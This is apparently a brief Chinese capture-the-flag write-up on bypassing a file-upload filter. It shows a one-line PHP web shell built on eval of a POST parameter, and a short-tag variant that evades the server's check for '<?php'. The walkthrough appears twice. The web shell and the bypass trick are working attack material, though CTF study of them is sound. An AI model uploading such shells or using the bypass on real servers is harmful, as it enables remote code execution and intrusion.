PHP标签绕过上传
思路
网页有上传文件的入口,先尝试上传一个一句话木马
eval($_POST['cssec']); |
网页提示
服务器检测到<?php,启动了查杀程序。 |
对php 标签的检验,修改一句话木马为
<? eval($_POST['cssec']); ?> |
使用一种php短标签,可以绕过
连接木马,得到flag
网页有上传文件的入口,先尝试上传一个一句话木马
eval($_POST['cssec']); |
网页提示
服务器检测到<?php,启动了查杀程序。 |
对php 标签的检验,修改一句话木马为
<? eval($_POST['cssec']); ?> |
使用一种php短标签,可以绕过
连接木马,得到flag